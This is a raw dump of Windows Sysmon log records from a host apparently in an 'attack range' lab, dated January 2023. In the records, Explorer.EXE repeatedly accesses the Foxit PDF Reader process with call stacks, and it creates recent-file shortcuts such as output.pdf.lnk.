Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 11241100x800000000000000040676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnk2023-01-18 12:18:31.433 10341000x800000000000000040675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000040659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b9427|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+811bb|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4 11241100x800000000000000040658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\output.pdf.lnk2023-01-18 12:18:31.417 10341000x800000000000000040657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF 